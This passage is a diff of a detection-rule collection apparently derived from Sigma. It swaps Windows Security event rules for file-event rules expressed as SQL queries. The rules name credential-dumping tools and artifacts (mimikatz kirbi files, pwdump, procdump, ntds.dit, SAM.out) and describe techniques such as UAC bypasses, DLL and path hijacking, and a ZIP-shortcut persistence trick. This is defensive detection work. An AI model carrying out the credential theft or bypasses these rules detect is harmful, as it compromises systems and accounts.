LIKE '%\\\\api-ms-win-core-%' ESCAPE '\\'))" ], - "filename": "win_security_sam_registry_hive_handle_request.yml" + "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml" }, { - "title": "Possible DC Shadow Attack", - "id": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", + "title": "Suspicious LNK Double Extension Files", + "id": "3215aa19-f060-4332-86d5-5602511f3ca8", "status": "experimental", - "description": "Detects DCShadow via create new SPN", - "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", + "description": "Detects dropped files with LNK double extension, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.credential_access", - "attack.t1207" + "attack.defense_evasion", + "attack.t1036.007" ], "falsepositives": [ - "Valid on domain controllers; exclude known DCs" + "Users creating a shortcut on e.g. desktop" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4742' AND ServicePrincipalNames LIKE '%GC/%' ESCAPE '\\') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'servicePrincipalName' AND AttributeValue LIKE 'GC/%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.lnk' ESCAPE '\\' AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Excel%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\PowerPoint%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word%' ESCAPE '\\')))" ], - "filename": "win_security_possible_dc_shadow.yml" + "filename": "file_event_win_susp_lnk_double_extension.yml" }, { - "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", - "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", - "status": "test", - "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "title": "Potential RipZip Attack on Startup Folder", + "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", + "status": "experimental", + "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", + "author": "Greg (rule)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "win_security_dcom_iertutil_dll_hijack.yml" + "filename": "file_event_win_ripzip_attack.yml" }, { - "title": "Kerberos Manipulation", - "id": "f7644214-0eb0-4ace-9455-331ec4c09253", + "title": "Potential Persistence Via Microsoft Office Add-In", + "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", "status": "test", - "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", + "author": "NVISO", "tags": [ - "attack.credential_access", - "attack.t1212" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ - "Faulty legacy applications" + "Legitimate add-ins" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\')))" ], - "filename": "win_security_susp_kerberos_manipulation.yml" + "filename": "file_event_win_office_addin_persistence.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - Security", - "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", + "title": "Creation of a Diagcab", + "id": "3d0ed417-3d94-4963-a562-4a92c940656a", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", + "author": "frack113", + "tags": [ + "attack.resource_development" + ], + "falsepositives": [ + "Legitimate microsoft diagcab" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE TargetFilename LIKE '%.diagcab' ESCAPE '\\'" + ], + "filename": "file_event_win_susp_diagcab.yml" + }, + { + "title": "UAC Bypass Using Windows Media Player - File", + "id": "68578b43-65df-4f81-9a9b-92f32711a951", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" + "filename": "file_event_win_uac_bypass_wmp.yml" }, { - "title": "PetitPotam Suspicious Kerberos TGT Request", - "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "title": "Office Template Creation", + "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", "status": "experimental", - "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", - "author": "Mauricio Velazco, Michael Haag", + "description": "Detects creation of template files for Microsoft Office from outside Office", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1187" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." + "Loading a user environment from a backup or a domain controller", + "Synchronization of templates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" + "SELECT * FROM logs WHERE ((((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" ], - "filename": "win_security_petitpotam_susp_tgt_request.yml" + "filename": "file_event_win_word_template_creation.yml" }, { - "title": "Defrag Deactivation - Security", - "id": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7", + "title": "Mimikatz Kirbi File Creation", + "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", "status": "test", - "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", - "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", + "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", + "author": "Florian Roth (Nextron Systems), David ANDRE", "tags": [ - "attack.persistence", - "attack.t1053", - "attack.s0111" + "attack.credential_access", + "attack.t1558" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4701' AND TaskName LIKE '\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\')" ], - "filename": "win_security_apt_slingshot.yml" + "filename": "file_event_win_hktl_mimikatz_files.yml" }, { - "title": "Important Scheduled Task Deleted/Disabled", - "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", + "title": "Legitimate Application Dropped Executable", + "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects programs on a Windows system that should not write executables to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" + "filename": "file_event_win_legitimate_app_dropping_exe.yml" }, { - "title": "Remote PowerShell Sessions Network Connections (WinRM)", - "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", + "title": "UAC Bypass Abusing Winsat Path Parsing - File", + "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", "status": "test", - "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use of remote PowerShell execution" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" ], - "filename": "win_security_remote_powershell_session.yml" + "filename": "file_event_win_uac_bypass_winsat.yml" }, { - "title": "Pass the Hash Activity 2", - "id": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", - "status": "stable", - "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", - "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", + "title": "Cred Dump Tools Dropped Files", + "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", + "status": "test", + "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1550.002" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.003", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Administrator activity" + "Legitimate Administrator using tool for password recovery" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4624' AND SubjectUserSid = 'S-1-0-0' AND LogonType = '3' AND LogonProcessName = 'NtLmSsp' AND KeyLength = '0') OR (EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo')) AND NOT (TargetUserName = 'ANONYMOUS LOGON'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\'))" ], - "filename": "win_security_pass_the_hash_2.yml" + "filename": "file_event_win_cred_dump_tools_dropped_files.yml" }, { - "title": "Azure AD Health Service Agents Registry Keys Access", - "id": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", + "title": "Creation Exe for Service with Unquoted Path", + "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", "status": "test", - "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\ADHealthAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\'" ], - "filename": "win_security_aadhealth_svc_agent_regkey_access.yml" + "filename": "file_event_win_creation_unquoted_service_path.yml" }, { - "title": "Access Token Abuse", - "id": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", + "title": "Suspicious Process Writes Ntds.dit", + "id": "11b1ed55-154d-4e82-8ad7-83739298f720", "status": "experimental", - "description": "This rule tries to detect token impersonation and theft. (Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)", - "author": "Michaela Adams, Zach Mathis", + "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1134.001" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "Anti-Virus" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'Advapi' AND AuthenticationPackageName = 'Negotiate' AND ImpersonationLevel LIKE '\\%\\%1833' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "win_security_access_token_abuse.yml" + "filename": "file_event_win_susp_ntds_dit.yml" }, { - "title": "Generic Password Dumper Activity on LSASS", - "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", + "title": "Suspicious Get-Variable.exe Creation", + "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", "status": "experimental", - "description": "Detects process handle on LSASS process with certain access mask", - "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", + "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "car.2019-04-004", - "attack.t1003.001" + "attack.persistence", + "attack.t1546", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\'" ], - "filename": "win_security_susp_lsass_dump_generic.yml" + "filename": "file_event_win_susp_get_variable.yml" }, { - "title": "Addition of Domain Trusts", - "id": "0255a820-e564-4e40-af2b-6ac61160335c", - "status": "stable", - "description": "Addition of domains is seldom and should be verified for legitimacy.", - "author": "Thomas Patzke", + "title": "Creation Of Non-Existent System DLL", + "id": "df6ecb8b-7822-4f4b-b412-08f524b4576c", + "status": "experimental", + "description": "Detects the creation of system dlls that are not present on the system. Usually to achieve dll hijacking", + "author": "Nasreddine Bencherchali 